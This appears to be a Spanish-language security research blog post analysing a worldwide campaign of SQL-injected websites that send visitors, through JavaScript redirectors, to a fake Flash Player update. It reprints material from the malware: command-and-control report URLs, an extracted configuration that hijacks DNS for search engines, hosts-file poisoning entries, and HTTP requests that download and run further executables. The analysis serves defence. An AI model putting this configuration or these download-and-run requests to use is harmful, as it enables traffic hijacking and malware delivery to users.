Autores
Durante los dos últimos años, junto con Yuri Namestnikov he estado investigando las extremadamente elevadas cifras de sitios web infectados. Todo comenzó cuando revisaba unas estadísticas locales de Suecia y noté un aumento del 3700% en un desviador de JavaScript, así como nuevas detecciones de nuevas variantes de exploits para Java, PDF y Flash. En este artículo publicado recientemente, advierto que Suecia está bajo un ataque informático:
http://www.viruslist.com/sp/weblog?weblogid=208188519
Pero después de profundizar en mi investigación, he observado que no sólo Suecia era víctima del ataque, sino que se trataba de una epidemia de proporciones mundiales. También he observado que estamos hablando de dos diferentes desviadores: b>Trojan.JS.Redirector.ro y Trojan.JS.Pakes.cp. A continuación ofrecemos ejemplos de otros países expuestos a los desviadores de JavaScript.
Hay que aclarar que no se trata de una lista estadística COMPLETA.
EL ESQUEMA
Entonces, ¿qué está sucediendo? La banda que está detrás de todo esto está vulnerando algunas aplicaciones web e inyectando códigos HTML que descargan un desviador JavaScript. Todavía no está claro de qué vulnerabilidades se trata, pero millones de sitios web han sido el blanco de este ataque. Lo que sabemos es que el código se inyecta a través de una inyección SQL, pero todavía no hemos descubierto si la vulnerabilidad se debe a servidores mal configurados o a una vulnerabilidad tipo día-cero. El JavaScript que el código HTML inyectado descarga luce así:
En el siguiente paso, se desvía a las víctimas hacia un servidor que valida el origen (país) de la víctima. Dependiendo de la localización, se ejecutará una carga maliciosa. En un ejemplo que analizamos, se desvía a los usuarios a un sitio malicioso que aparece como un video de YouTube cuyo objetivo es inducir al usuario a que descargue una actualización de Flash Player, que en realidad es un programa malicioso.
La configuración técnica es casi idéntica a la de Lizamoon, cuyo caso analizamos hace unos meses. Algunos nombres de archivos, algunas técnicas y también la configuración del servidor son idénticos.
ANÁLISIS DE PROGRAMAS MALICIOSOS (¡en proceso!)
Si la víctima descarga y ejecuta la falsa actualización de FlashPlayer, ésta se conectará con los siguientes servidores:
- 209.212.147.141/chrome/report.html
- 98.142.243.64/chrome/report.html
- 65.98.83.115/?19= (Virtual Host: update.19runs10q3.com)
Después de ejecutarse, el programa malicioso modificará el archivo hosts y “envenenará” algunos dominios. Hará que el ordenador infectado use servidores DNS maliciosos, y desviará a los usuarios hacia sitios web maliciosos. El siguiente archivo de configuración se extrajo del programa malicioso:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 |
[redirected_dns] -affiliate=9; -DnsServerIp=66.197.152.72; -DnsServerIp=75.102.22.72; -DnsServerIp=205.234.236.192; -FakeDnsServerIp=66.197.152.71; -FakeDnsServerIp=75.102.22.71; -FakeDnsServerIp=205.234.236.191; [redirect_timeouts] -response_timeout=40000; -redirect_deactivating_interval=40020; [reports] -Version=260; -host=98.142.243.64/chrome/report.html; -host_first=209.212.147.141/chrome/report.html; -check_timeout=10000; -disable_reports=0; [AntiRB] -server=65.98.83.115; [GUI] -long_start=0; [UAC] -DelayBeforeRun=10; [redirected_ips] [redirected_domains] -www.google.com.=87.125.87.99; -google.com.=87.125.87.103; -google.com.au.=87.125.87.104; -www.google.com.au.=87.125.87.147; -google.be.=77.125.87.148; -www.google.be.=77.125.87.149; -google.com.br.=77.125.87.109; -www.google.com.br.=77.125.87.150; -google.ca.=77.125.87.152; -www.google.ca.=77.125.87.153; -google.ch.=77.125.87.155; -www.google.ch.=77.125.87.158; -google.de.=77.125.87.160; -www.google.de.=77.125.87.161; -google.dk.=92.125.87.123; -www.google.dk.=92.125.87.160; -google.fr.=92.125.87.154; -www.google.fr.=92.125.87.134; -google.ie.=92.125.87.170; -www.google.ie.=92.125.87.177; -google.it.=92.125.87.173; -www.google.it.=92.125.87.147; -google.co.jp.=92.125.87.103; -www.google.co.jp.=84.125.87.147; -google.nl.=84.125.87.103; -www.google.nl.=84.125.87.147; -google.no.=84.125.87.103; -www.google.no.=84.125.87.147; -google.co.nz.=84.125.87.103; -www.google.co.nz.=84.125.87.147; -google.pl.=84.125.87.103; -www.google.pl.=64.125.87.147; -google.se.=64.125.87.103; -www.google.se.=64.125.87.147; -google.co.uk.=64.125.87.103; -www.google.co.uk.=64.125.87.147; -google.co.za.=64.125.87.103; -www.google.co.za.=64.125.87.147; -www.google-analytics.com.=64.125.87.101; -www.bing.com.=92.123.68.97; -search.yahoo.com.=72.30.186.249; -www.search.yahoo.com.=72.30.186.249; -uk.search.yahoo.com.=87.248.112.8; -ca.search.yahoo.com.=100.6.239.84; -de.search.yahoo.com.=87.248.112.8; -fr.search.yahoo.com.=87.248.112.8; -au.search.yahoo.com.=87.248.112.8; -ad-emea.doubleclick.net.=64.125.87.101; -www.statcounter.com.=64.125.87.101; [redirected_domains_hosts] -www.google-analytics.com.=64.125.87.101; -ad-emea.doubleclick.net.=64.125.87.101; -www.statcounter.com.=64.125.87.101; |
Después, el programa malicioso cambiará la configuración DNS modificando el archivo hosts para envenenar los siguientes hostnames:
- 74.55.76.230 www.google-analytics.com.
- 74.55.76.230 ad-emea.doubleclick.net.
- 74.55.76.230 www.statcounter.com.
Asimismo, el programa malicioso descargará y ejecutará actualizaciones. Se han recogido algunas de las siguientes solicitudes:
/?controller=hash
HTTP/1.1
Host: update1.randomstring.com
User-Agent: IE7
/?abbr=RTK&setupType=update&uid=%d&ttl
=%s&controller=microinstaller&pid=3
HTTP/1.1
Host: update1.randomstring.com
User-Agent: IE7
HTTP/1.1
/update_c1eec.exe
Host: update1.randomstring.com
User-Agent: IE7
/?abbr=RTK&setupType=update&uid=%d&ttl=
%s&controller=microinstaller&pid=3
HTTP/1.1
Host: update1.randomstring.com
También vemos un gran crecimiento de exploits Java, PDF y Flash en el mundo real, pero todavía no estamos seguros de que este ataque sea también responsable de explotar a las víctimas expuestas a esas vulnerabilidades. Pero en todos los países mencionados en las estadísticas, estos exploits han aumentado de golpe en septiembre y octubre. En cuanto tenga más información, la publicaré.
Autores
De los mismos autores
En la misma categoría
Prosigue nuestro análisis de infecciones masivas – Millones de sitios web infectados